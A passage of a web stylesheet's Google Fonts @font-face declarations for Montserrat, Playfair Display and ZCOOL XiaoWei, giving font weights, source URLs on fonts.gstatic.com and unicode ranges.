swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.5.woff2) format(\'woff2\');unicode-range: U+fee3, U+fef3, U+ff03-ff04, U+ff07, U+ff0a, U+ff17-ff19, U+ff1c-ff1d, U+ff20-ff3a, U+ff3c, U+ff3e-ff5b, U+ff5d, U+ff61-ff65, U+ff67-ff6a, U+ff6c, U+ff6f-ff78, U+ff7a-ff7d, U+ff80-ff84, U+ff86, U+ff89-ff8e, U+ff92, U+ff97-ff9b, U+ff9d-ff9f, U+ffe0-ffe4, U+ffe6, U+ffe9, U+ffeb, U+ffed, U+fffc, U+1f004, U+1f170-1f171, U+1f192-1f195, U+1f198-1f19a, U+1f1e6-1f1e8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.6.woff2) format(\'woff2\');unicode-range: U+f0a7, U+f0b2, U+f0b7, U+f0c9, U+f0d8, U+f0da, U+f0dc-f0dd, U+f0e0, U+f0e6, U+f0eb, U+f0fc, U+f101, U+f104-f105, U+f107, U+f10b, U+f11b, U+f14b, U+f18a, U+f193, U+f1d6-f1d7, U+f244, U+f27a, U+f296, U+f2ae, U+f471, U+f4b3, U+f610-f611, U+f880-f881, U+f8ec, U+f8f5, U+f8ff, U+f901, U+f90a, U+f92c-f92d, U+f934, U+f937, U+f941, U+f965, U+f967, U+f969, U+f96b, U+f96f, U+f974, U+f978-f979, U+f97e, U+f981, U+f98a, U+f98e, U+f997, U+f99c, U+f9b2, U+f9b5, U+f9ba, U+f9be, U+f9ca, U+f9d0-f9d1, U+f9dd, U+f9e0-f9e1, U+f9e4, U+f9f7, U+fa00-fa01, U+fa08, U+fa0a, U+fa11, U+fb01-fb02, U+fdfc, U+fe0e, U+fe30-fe31, U+fe33-fe44, U+fe49-fe52, U+fe54-fe57, U+fe59-fe66, U+fe68-fe6b, U+fe8e, U+fe92-fe93, U+feae, U+feb8, U+fecb-fecc, U+fee0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.21.woff2) format(\'woff2\');unicode-range: U+9f83, U+9f85-9f8d, U+9f90-9f91, U+9f94-9f96, U+9f98, U+9f9b-9f9c, U+9f9e, U+9fa0, U+9fa2, U+9ff0-9fff, U+a001, U+a007, U+a025, U+a046-a047, U+a057, U+a072, U+a078-a079, U+a083, U+a085, U+a100, U+a118, U+a132, U+a134, U+a1f4, U+a242, U+a4a6, U+a4aa, U+a4b0-a4b1, U+a4b3, U+a9c1-a9c2, U+ac00-ac01, U+ac04, U+ac08, U+ac10-ac11, U+ac13-ac16, U+ac19, U+ac1c-ac1d, U+ac24, U+ac70-ac71, U+ac74, U+ac77-ac78, U+ac80-ac81, U+ac83, U+ac8c, U+ac90, U+ac9f-aca0, U+aca8-aca9, U+acac, U+acb0, U+acbd, U+acc1, U+acc4, U+ace0-ace1, U+ace4, U+ace8, U+acf3, U+acf5, U+acfc-acfd, U+ad00, U+ad0c, U+ad11, U+ad1c, U+ad34, U+ad50, U+ad64, U+ad6c, U+ad70, U+ad74, U+ad7f, U+ad81, U+ad8c, U+adc0, U+adc8, U+addc, U+ade0, U+adf8-adf9, U+adfc, U+ae00, U+ae08-ae09, U+ae0b, U+ae30, U+ae34, U+ae38, U+ae40, U+ae4a, U+ae4c, U+ae54, U+ae68, U+aebc, U+aed8, U+af2c-af2d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.22.woff2) format(\'woff2\');unicode-range: U+9e30-9e33, U+9e35-9e3b, U+9e3e, U+9e40-9e44, U+9e46-9e4e, U+9e51, U+9e53, U+9e55-9e58, U+9e5a-9e5c, U+9e5e-9e63, U+9e66-9e6e, U+9e71, U+9e73, U+9e75, U+9e78-9e79, U+9e7c-9e7e, U+9e82, U+9e86-9e88, U+9e8b-9e8c, U+9e90-9e91, U+9e93, U+9e95, U+9e97, U+9e9d, U+9ea4-9ea5, U+9ea9-9eaa, U+9eb4-9eb5, U+9eb8-9eba, U+9ebc-9ebf, U+9ec3, U+9ec9, U+9ecd, U+9ed0, U+9ed2-9ed3, U+9ed5-9ed6, U+9ed9, U+9edc-9edd, U+9edf-9ee0, U+9ee2, U+9ee5, U+9ee7-9eea, U+9eef, U+9ef1, U+9ef3-9ef4, U+9ef6, U+9ef9, U+9efb-9efc, U+9efe, U+9f0b, U+9f0d, U+9f10, U+9f14, U+9f17, U+9f19, U+9f22, U+9f29, U+9f2c, U+9f2f, U+9f31, U+9f37, U+9f39, U+9f3d-9f3e, U+9f41, U+9f4a-9f4b, U+9f51-9f52, U+9f61-9f63, U+9f66-9f67, U+9f80-9f81;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.23.woff2) 